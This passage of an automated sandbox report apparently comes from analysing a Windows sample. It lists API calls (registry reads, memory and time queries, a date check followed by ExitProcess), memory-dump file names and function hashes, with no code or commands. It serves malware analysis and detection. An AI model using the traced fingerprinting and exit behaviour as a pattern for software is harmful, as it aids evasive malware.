                          • memmove.MSVCRT(00000000,?,?), ref: 00425B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 34222853b1227f2056b2f582caa2accab358a8afa38bc1f76db0d2b8d6ab2633
                          • Instruction ID: 97a36a66eccf3a265aeb651c217b2c8c0e856f970e525689608aac58b2709a3b
                          • Opcode Fuzzy Hash: 34222853b1227f2056b2f582caa2accab358a8afa38bc1f76db0d2b8d6ab2633
                          • Instruction Fuzzy Hash: 3E418271B005199FCF18DF6CD991AAEBBB5EB88310F14822AE905E7344E634ED00CB94
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417D58
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1D5
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: 57a01d2137173045cca62e33490d6a9c41bca20fe5812ee791e1896c1f9a44ca
                          • Instruction ID: 77123055882c8daa5c63bbea810ac3c2970f1bc3c4d1b7b5e79e5cd4f3fc3ccb
                          • Opcode Fuzzy Hash: 57a01d2137173045cca62e33490d6a9c41bca20fe5812ee791e1896c1f9a44ca
                          • Instruction Fuzzy Hash: F321B6313043044BD720DE6CE881ABAF7F5AF96764F204A6FE4528B381D775DC908769
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004233EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004233F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00423411
                          • wsprintfA.USER32 ref: 00423437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: fb51181e03ceb3a90fb71e1016e28f08c61a464ea28ebc853029e4ba336a3f6d
                          • Instruction ID: ef3c641950d25003a85ee71c29f446933f2f7acfadf4867beb197e41391b6256
                          • Opcode Fuzzy Hash: fb51181e03ceb3a90fb71e1016e28f08c61a464ea28ebc853029e4ba336a3f6d
                          • Instruction Fuzzy Hash: 6501B971B04614AFD704DF98DD45B6EB7B9FB44711F50012AF906E7380D7B8590086E5
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00FBD7A8,00000000,00020119,?), ref: 0041D7F5
                          • RegQueryValueExA.ADVAPI32(?,00FBE0C8,00000000,00000000,00000000,000000FF), ref: 0041D819
                          • RegCloseKey.ADVAPI32(?), ref: 0041D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0041D848
                          • lstrcat.KERNEL32(?,00FBDF30), ref: 0041D85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: ac4654c9b423e5f92f1e0f5bbd4689b147bb9237eec9d2d29ba4c608ca516213
                          • Instruction ID: ebb675e1f18c9ff88a6f8fc4f084349e0bd5ec3e988502ddfef77187666a6176
                          • Opcode Fuzzy Hash: ac4654c9b423e5f92f1e0f5bbd4689b147bb9237eec9d2d29ba4c608ca516213
                          • Instruction Fuzzy Hash: 5C41A671A1020CAFCB54EF68EC86BDE7775AF44308F404069B509A7291EE74AA89CFD5
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00417F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00417F60
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00417FA5
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00417FD3
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00418007
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 27ee802af8f57e5b22a2aa5ddacbdac98787300f0224adeae04b18bbf0927ecd
                          • Instruction ID: a47a97511255cf1e93cbb1994b44434e641159a6d8ba5c9092000f8818cae911
                          • Opcode Fuzzy Hash: 27ee802af8f57e5b22a2aa5ddacbdac98787300f0224adeae04b18bbf0927ecd
                          • Instruction Fuzzy Hash: D8418E7060411ADFCB20DF68D884EEF77B4EF58300F11409AE8059B351DB78AA96CF95
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 004180BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004180EA
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 00418102
                          • lstrlen.KERNEL32(00000000), ref: 00418140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 03c5d7b75bc190de1076f6e13919b025d67f824dacdced373c74aa1090816c3c
                          • Instruction ID: 76ebc02826cfc164f246855d272761f98fffe6926c554f914627be4f1755e0ee
                          • Opcode Fuzzy Hash: 03c5d7b75bc190de1076f6e13919b025d67f824dacdced373c74aa1090816c3c
                          • Instruction Fuzzy Hash: DC418F72600206ABDB21DF68D948BEBBBF4EF44700F11841EA845D7254EF78D985CB94
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00421B72
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0042184F
                            • Part of subcall function 00421820: lstrlen.KERNEL32(00FA6058), ref: 00421860
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 00421887
                            • Part of subcall function 00421820: lstrcat.KERNEL32(00000000,00000000), ref: 00421892
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 004218C1
                            • Part of subcall function 00421820: lstrlen.KERNEL32(00434FA0), ref: 004218D3
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 004218F4
                            • Part of subcall function 00421820: lstrcat.KERNEL32(00000000,00434FA0), ref: 00421900
                            • Part of subcall function 00421820: lstrcpy.KERNEL32(00000000,00000000), ref: 0042192F
                          • sscanf.NTDLL ref: 00421B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BC6
                          • ExitProcess.KERNEL32 ref: 00421BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                          • Instruction ID: 276e4b54b55f1c3fc1aac48e3fc79cc90fd1a426ff4117ad04e9df3e7fe316e2
                          • Opcode Fuzzy Hash: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                          • Instruction Fuzzy Hash: A72102B1508301AF8344EF69D88485BBBF9EED8304F409A1EF599C3220E774E508CFA6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00423166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042316D
                          • RegOpenKeyExA.ADVAPI32(80000002,00FABAB8,00000000,00020119,?), ref: 0042318C
                          • RegQueryValueExA.ADVAPI32(?,00FBD5C8,00000000,00000000,00000000,000000FF), ref: 004231A7
                          • RegCloseKey.ADVAPI32(?), ref: 004231B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: a379eebdbbcec35e8ed859733ff2708c3a1330b01a2a2298d96069c18e9e916f
                          • Instruction ID: 72d06ee534f6cf1181431bf03795815ec5e5a6cf7f7641d8e7f8cf2242cfd827
                          • Opcode Fuzzy Hash: a379eebdbbcec35e8ed859733ff2708c3a1330b01a2a2298d96069c18e9e916f
                          • Instruction Fuzzy Hash: 23116072A04219AFD714CB94EC45BABB7BDEB48711F00411AFA05D3680DB7459048BE1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: ffa0fc8cb5b117a572237663c2bf107fb99d826a99f32ac2768660c11bf34147
                          • Instruction ID: 3cc3571cb7d3249784501328a2d6d89bea399650c511c2e715f1fbad0d9813f4
                          • Opcode Fuzzy Hash: ffa0fc8cb5b117a572237663c2bf107fb99d826a99f32ac2768660c11bf34147
                          • Instruction Fuzzy Hash: 8A41587020036CAEEB318B259C84FFB7BFC9F45304F5448E9E98682182E2749E45CF28
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00408996
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1D5
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 004089CD
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: cf06c6c856652c21ea2d01edeea654692fedbbab4fa9a7616b73302648be6306
                          • Instruction ID: b6eb26a96cfbca8ec75c0cd6a4033348675f8408321a396137d56c2385240345
                          • Opcode Fuzzy Hash: cf06c6c856652c21ea2d01edeea654692fedbbab4fa9a7616b73302648be6306
                          • Instruction Fuzzy Hash: DF21D8723006508BC720AA5CE940A6AF7A59BA1761B20093FF5C1DB6C1CB75D851C7AD
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00408883
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
